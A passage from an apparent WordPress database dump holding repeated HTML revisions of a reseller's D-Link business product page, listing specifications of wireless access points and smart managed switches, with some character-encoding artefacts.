Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:30:45','2019-09-25 06:30:45','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3400,1,'2019-09-25 14:31:13','2019-09-25 06:31:13','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ 